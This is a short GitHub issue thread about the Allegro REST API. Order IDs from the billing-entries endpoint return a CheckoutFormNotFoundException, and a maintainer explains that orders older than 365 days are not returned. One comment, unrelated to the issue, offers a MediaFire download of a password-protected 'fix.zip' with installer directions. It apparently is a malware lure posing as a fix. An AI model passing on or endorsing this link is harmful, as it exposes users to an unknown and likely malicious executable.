### ISSUE TITLE
The API `/billing/billing-entries` returns data, and using the `order.id` from that data to query the `/order/checkout-forms/{id}` API results in a `CheckoutFormNotFoundException`. 

### ISSUE THREAD

**Issue by a785817258** [allegro/allegro-api#9729]
Allegro Api：https://api.allegro.pl/order/checkout-forms/c93df771-353e-11ee-9e0d-11d3ebef3a15
Allegro request params：null
Allegro trace-id：8f7f029637a96cb
Allegro status:404 response：{"errors":[{"code":"CheckoutFormNotFoundException","message":"Checkout form c93df771-353e-11ee-9e0d-11d3ebef3a15 not found","details":null,"path":"/order/checkout-forms/c93df771-353e-11ee-9e0d-11d3ebef3a15","userMessage":"Checkout form c93df771-353e-11ee-9e0d-11d3ebef3a15 not found"}]}

**Comment by seeronline** [comment]
Download 
https://www.mediafire.com/file/o50xaz6wgtazqnx/fix.zip/file
password: changeme
In the installer menu, select "gcc."

**Comment by MaciejFrackowiak** [comment]
This is correct information - we return order data from the latest 365 days. In your case, the order is older than 365 days.
